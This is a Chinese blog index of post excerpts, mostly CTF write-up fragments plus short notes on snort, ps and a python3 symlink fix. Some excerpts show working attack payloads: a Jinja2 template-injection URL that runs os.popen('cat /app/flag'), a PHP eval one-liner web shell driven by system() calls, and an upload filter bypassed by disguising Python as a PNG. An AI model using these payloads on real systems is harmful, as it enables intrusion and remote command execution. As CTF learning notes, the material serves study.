摘要:有个提示,上传一个py,他会返回结果给我 但是有限制,只能png、jpg,新建一个png图片,把py代码放进去或者在burpsuite里改也行,后面就是本地系统命令找flag文件,然后cat
阅读全文
摘要:先用简单的语句测试下,可以返回运算结果 再执行系统命令find找到flag文件后,直接cat http://114.67.246.176:13466/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat /app/flag')
阅读全文
摘要:1、查系统所有网卡 snort.exe -W 2、监听3接口 snort.exe -i3 -v
阅读全文
摘要:1、 题目的样子,要输入密码 2、 随便输了下,回车后 3、 直接F12看看源码先 function dechiffre(pass_enc) { var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65"; var tab =
阅读全文
摘要:题目的页面 题目的目录遍历有一定规律,都是数字排序,而且只有两层目录 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests url = "http://challenge-cf866d8944333af5.sandbox.ctfh
阅读全文
摘要:比如下面的一句话php <?php @eval($_POST['shell']);?> 通过在hackbar中输入shell=system("find / -name 'flag*'");就可以查找本地flag文件(末尾带上分号;) 同样windows系统也可以执行系统命令 参考: 一句话木马(we
阅读全文
摘要:bash: /usr/bin/python3: No such file or directory 原因为/usr/bin/下无python3或软连接,用ln -s /usr/local/python3.9.7/bin/python3 /usr/bin/python3即可 参考: Centos7 下
阅读全文
摘要:本博客漏洞复现文章,渗透测试文章,仅供学习参考,请勿用于实战!!有授权情况下除外!! 由于传播、利用本博客文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责。 《网络产品安全漏洞管理规定》 第一条 为了规范网络产品安全漏洞发现、报告、修补和发布等行为,防范网络安全风险,根据《中
阅读全文
摘要:ps aux可以看进程占用的cpu、mem、虚拟内存 ps -ef可以看进程的父pid 都可以看完整的command字段
阅读全文
摘要:渗透测试工具实战技巧合集 xiaix 2016-05-27 共32572人围观,发现13个不明物体_If you can take it, you can make it.-CSDN博客
阅读全文